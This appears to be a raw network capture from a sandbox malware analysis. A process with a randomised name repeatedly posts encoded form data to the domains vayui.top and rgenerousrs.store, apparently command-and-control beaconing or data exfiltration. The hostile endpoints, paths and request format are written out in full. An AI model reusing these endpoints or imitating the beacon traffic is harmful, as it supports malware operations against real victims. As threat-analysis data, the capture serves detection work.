                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:28:50.155714989 CET1194INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:49 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 993
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                          Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("b5c8267bc256c89f7074d57c4d2ebc21");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&sDDX=EfDhNx4xefjT3b5P&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.649999172.67.145.23480768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:28:55.640727043 CET745OUTPOST /vg0z/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.vayui.top
                                                          Origin: http://www.vayui.top
                                                          Referer: http://www.vayui.top/vg0z/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 71 56 57 64 4e 35 42 6a 6a 4b 4f 39 47 43 38 73 4d 57 78 4d 39 69 44 32 34 50 5a 2f 53 43 30 51 43 58 38 57 6b 6a 58 38 43 72 30 72 4c 50 41 41 44 70 47 6e 57 6b 65 7a 56 4d 4b 39 39 64 7a 37 32 56 5a 30 32 64 6b 51 61 43 4b 33 72 34 61 56 6a 59 70 73 69 4f 37 55 67 6a 6c 56 6f 69 62 46 34 7a 55 65 2b 61 39 76 77 59 48 6a 52 4f 6c 75 35 41 67 5a 75 77 4b 66 4f 41 43 45 5a 61 76 37 65 51 51 2f 50 66 61 58 4c 4a 37 36 69 43 2b 54 33 42 44 56 33 62 79 4f 36 79 71 2b 43 5a 48 7a 65 58 5a 79 33 31 77 4d 4a 67 6b 45 68 41 44 58 6b 43 6c 72 5a 4a 43 4a 72 4e 37 37 71 34 30
                                                          Data Ascii: b6=27GE0W46HILaWqVWdN5BjjKO9GC8sMWxM9iD24PZ/SC0QCX8WkjX8Cr0rLPAADpGnWkezVMK99dz72VZ02dkQaCK3r4aVjYpsiO7UgjlVoibF4zUe+a9vwYHjROlu5AgZuwKfOACEZav7eQQ/PfaXLJ76iC+T3BDV3byO6yq+CZHzeXZy31wMJgkEhADXkClrZJCJrN77q40
                                                          Dec 3, 2024 23:28:57.237117052 CET912INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:28:57 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XBt3%2B%2BPrqpUtsr0PSrY9vfS6p%2BSY%2Fho%2B2kDWEGJpkz4clJgh5OhMnxSR1MjALPZ6BdJ4MypXPShu8BCz9w9oo6VFguH%2FOnL617KmFzy7Le4qJ81eYhkZSe7JTDbWqYTl"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6fe1d9c5d18ea-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1456&rtt_var=728&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=745&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.650005172.67.145.23480768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:28:58.305460930 CET769OUTPOST /vg0z/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.vayui.top
                                                          Origin: http://www.vayui.top
                                                          Referer: http://www.vayui.top/vg0z/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 6d 30 51 6d 62 38 59 46 6a 58 31 53 72 30 6b 72 50 59 4f 6a 70 50 6e 57 59 38 7a 58 49 4b 39 35 4e 7a 37 30 4e 5a 30 6e 64 6c 53 4b 43 45 73 62 34 63 62 44 59 70 73 69 4f 37 55 6b 4b 74 56 70 4b 62 46 49 44 55 65 66 61 2b 77 41 59 47 69 52 4f 6c 2f 70 41 6b 5a 75 78 5a 66 4b 42 6e 45 62 69 76 37 61 63 51 2b 64 33 5a 65 4c 4a 35 35 53 44 39 44 55 30 6d 62 32 43 65 43 38 36 38 76 79 6c 73 37 49 4b 44 75 45 31 54 65 5a 41 6d 45 6a 59 78 58 45 43 50 70 5a 78 43 62 38 42 63 30 65 64 58 6d 42 4a 4f 6f 53 46 32 78 4b 50 72 7a 30 55 6c 79 48 6b 71 46 51 3d 3d
                                                          Data Ascii: b6=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hm0Qmb8YFjX1Sr0krPYOjpPnWY8zXIK95Nz70NZ0ndlSKCEsb4cbDYpsiO7UkKtVpKbFIDUefa+wAYGiROl/pAkZuxZfKBnEbiv7acQ+d3ZeLJ55SD9DU0mb2CeC868vyls7IKDuE1TeZAmEjYxXECPpZxCb8Bc0edXmBJOoSF2xKPrz0UlyHkqFQ==
                                                          Dec 3, 2024 23:28:59.554809093 CET908INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:28:59 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zan3ks7g%2FmWr2oE6XaRVZtrrrZU39zQM%2BLpmULiZlBL4rcDB1w6mspGhyHqnySJFLUdXWeMpHpfaVo9zN1O0beDeywvGGsi%2BWQ3iWRm0nNvJ2ZiDP5YJzVxE%2BeqBwPp9"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6fe2e4b9f43e3-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.650013172.67.145.23480768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:29:00.977037907 CET1782OUTPOST /vg0z/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.vayui.top
                                                          Origin: http://www.vayui.top
                                                          Referer: http://www.vayui.top/vg0z/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 75 30 51 56 54 38 59 6e 4c 58 6e 43 72 30 74 4c 50 62 4f 6a 6f 50 6e 57 77 34 7a 58 55 38 39 37 46 7a 70 48 46 5a 6a 6b 46 6c 62 4b 43 45 6b 37 34 5a 56 6a 5a 74 73 69 65 2f 55 67 75 74 56 70 4b 62 46 4b 4c 55 4a 65 61 2b 79 41 59 48 6a 52 4f 78 75 35 41 63 5a 71 6c 4a 66 4b 55 53 59 34 71 76 36 2b 77 51 7a 4f 66 5a 43 62 4a 42 77 43 44 66 44 55 6f 31 62 32 75 73 43 38 6d 57 76 31 4e 73 74 74 6a 5a 31 6c 77 4a 43 6f 55 57 51 79 59 68 66 43 71 66 6e 37 74 76 53 65 52 44 31 39 52 41 67 48 4a 35 71 6a 4d 79 32 37 62 61 33 46 56 48 36 55 52 64 54 79 56 44 55 34 68 75 71 4c 71 70 41 5a 4f 61 48 4b 49 55 46 39 51 46 2f 68 6d 66 50 4e 70 70 2f 36 46 66 2b 57 57 36 51 39 38 31 4d 73 32 79 6b 65 63 50 73 6f 2b 67 6a 78 65 43 56 6b 70 2b 66 68 64 42 78 64 31 6f 6c 4a 35 52 33 30 44 32 47 31 6c 39 44 55 39 33 4b 6b 59 34 37 74 37 47 36 69 69 42 38 76 5a 61 75 69 64 57 33 43 79 [TRUNCATED]
                                                          Data Ascii: b6=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hu0QVT8YnLXnCr0tLPbOjoPnWw4zXU897FzpHFZjkFlbKCEk74ZVjZtsie/UgutVpKbFKLUJea+yAYHjROxu5AcZqlJfKUSY4qv6+wQzOfZCbJBwCDfDUo1b2usC8mWv1NsttjZ1lwJCoUWQyYhfCqfn7tvSeRD19RAgHJ5qjMy27ba3FVH6URdTyVDU4huqLqpAZOaHKIUF9QF/hmfPNpp/6Ff+WW6Q981Ms2ykecPso+gjxeCVkp+fhdBxd1olJ5R30D2G1l9DU93KkY47t7G6iiB8vZauidW3Cy643FAbGAxs+jDR4nzgzNeEGuiY+A5dvLdYTglf+y+WBlWMYOHfqeIFTj48Ug4TLor9co2t46GhrldHCfmQ1rT/0ElhGE+34rmQpDBScfUvdBxd2oFmqHIJPFYPD+v9YJUrItLGdoFGxofYZ9fL+adsHbehdNZq021yBT0XmaDXZ8HA0k+J2ukOG3G1qfqJXs0V38LOIaoMTM82i1sfoR9HwAHvBD/TRjswbU/udZ09CdakKcjyefN6fNgcRm2O0NMLTqTCp66a/KtcqWURSRBo1SUUj83Yih2od6iO14lPzNHDeaeM//x5FsJkeyXWhuXvkX6oa9ChMkI1pTJCUjyQzNEJrzHNBzyUvYERBpZctADcmcjRTZONUHJslf8I7bbYODBSL9xHxFuKj0hlzIg4MVBsbni4ghoGt9E/mb2KSkK1DXug72qFLUrUsglnU0QAK3X7nqWAsFwWyrkf6Oo01ABk7aCHpURESrHMhH8tM4/qQ7NYzuOExXyqF7MjKUn4xvjjyje0N82rLx40HARXVYdx6miEKGzxtnRb+v7Jc+HgaMstuoOb7VZ9TGFZt+6ogmeXirJflTuF1Up624kJcQBZVOSVm+v27hIbuDXmHVo30PNfLlUvRhTYPX/wGS2srzzHqXv9nUacXFYNph5TIlDpCracfdYN [TRUNCATED]
                                                          Dec 3, 2024 23:29:02.517219067 CET907INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:02 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuGmHRhyp2yInOtvh4Fa470vyDVmqr%2Bl9RWhf7URkL23c4RihzoCzts6zcqeO264QGXdjLKqRWHHQuzZhvqj51n71VSC4Jr9yBbx%2BFADvHm64439trgEe%2BL397uOcc9K"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6fe3edecc15d7-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1581&rtt_var=790&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1782&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.650021172.67.145.23480768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:29:03.638772011 CET501OUTGET /vg0z/?b6=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFrWSncccbEBJ6T2ZUmHvVL3BVpynffLQ4AgBix/2srBcYLhAIes=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.vayui.top
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:29:04.923130989 CET923INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:04 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRdhCF7lc3yjw0%2F%2FfAxy5m4RakYA0D6ABxTwWEzEOoDEuVyOYXy6rRvqpPZ5QuDKPojZv0lfE1E8HbF%2B8fvj3e8nxYV3WqcPcrpSFy8SxPu7R4j1yIe9qTbP%2Blep%2B2dg"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6fe4fc99e430f-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=501&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.650030172.67.167.14680768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:29:10.493513107 CET769OUTPOST /o362/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.rgenerousrs.store
                                                          Origin: http://www.rgenerousrs.store
                                                          Referer: http://www.rgenerousrs.store/o362/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 31 55 68 6a 62 68 72 57 67 39 41 34 58 57 34 61 44 41 62 58 74 63 71 51 5a 32 63 44 62 33 70 41 76 76 5a 68 32 2f 72 54 39 2b 57 61 53 58 4a 75 38 48 30 38 6e 46 68 30 5a 43 7a 68 32 4d 5a 71 34 34 67 2b 73 4d 48 76 41 33 6d 33 37 6a 2b 4f 41 77 52 69 47 68 6b 59 33 4f 72 46 66 7a 55 6d 72 55 4b 66 61 6c 44 63 36 44 4f 6c 56 55 65 67 39 63 46 42 6c 4f 6b 58 34 66 77 32 78 6f 36 41 56 43 61 4e 5a 52 6f 43 4d 43 5a 35 61 4a 58 71 6d 67 48 4e 6d 71 74 55 62 6a 6a 6c 30 52 7a 54 78 65 34 32 2b 50 5a 6c 6b 34 33 56 4c 33 44 49 61 46 45 73 2f 63 76 31 6c 57 35 39 52 65 36 42
                                                          Data Ascii: b6=IYlouYrI0yQl1UhjbhrWg9A4XW4aDAbXtcqQZ2cDb3pAvvZh2/rT9+WaSXJu8H08nFh0ZCzh2MZq44g+sMHvA3m37j+OAwRiGhkY3OrFfzUmrUKfalDc6DOlVUeg9cFBlOkX4fw2xo6AVCaNZRoCMCZ5aJXqmgHNmqtUbjjl0RzTxe42+PZlk43VL3DIaFEs/cv1lW59Re6B
                                                          Dec 3, 2024 23:29:12.024136066 CET1095INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:11 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rGwW8YZYGqXOQ2GQX69tYzoGLflPrPMbc01lRT8n4bvnZ%2BlgUCNR4pu3LZKIcAG3Mgn2Qj0SV82KEBsuufhLLdwoX2l5BDfZ1IjNnVcNzcUlcr5ZtMbQVFpkANSuiYOYWU6JXl8AFnw%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6fe7ad90a8c36-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1825&rtt_var=912&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.650031172.67.167.14680768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:29:13.158278942 CET793OUTPOST /o362/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.rgenerousrs.store
                                                          Origin: http://www.rgenerousrs.store
                                                          Referer: http://www.rgenerousrs.store/o362/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 35 41 76 4c 4a 68 31 36 48 54 2b 2b 57 61 5a 33 4a 52 7a 6e 31 52 6e 46 73 4a 5a 48 54 68 32 4d 6c 71 34 34 77 2b 74 2f 76 73 44 48 6d 35 77 44 2b 4d 4f 51 52 69 47 68 6b 59 33 4f 50 38 66 33 34 6d 72 6b 61 66 62 41 76 62 33 6a 4f 69 57 55 65 67 71 4d 46 46 6c 4f 6b 6c 34 64 46 54 78 75 2b 41 56 47 4b 4e 59 41 6f 42 47 43 5a 7a 58 70 57 75 6c 54 44 48 75 49 59 6c 62 43 66 5a 75 7a 37 73 35 49 6c 73 69 38 5a 47 32 6f 58 58 4c 31 62 36 61 6c 45 47 39 63 58 31 33 42 31 61 65 71 66 69 31 37 70 44 32 4d 36 75 75 62 77 64 6f 4d 64 46 78 7a 71 38 38 51 3d 3d
                                                          Data Ascii: b6=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYB5AvLJh16HT++WaZ3JRzn1RnFsJZHTh2Mlq44w+t/vsDHm5wD+MOQRiGhkY3OP8f34mrkafbAvb3jOiWUegqMFFlOkl4dFTxu+AVGKNYAoBGCZzXpWulTDHuIYlbCfZuz7s5Ilsi8ZG2oXXL1b6alEG9cX13B1aeqfi17pD2M6uubwdoMdFxzq88Q==
                                                          Dec 3, 2024 23:29:14.600403070 CET1094INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:14 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
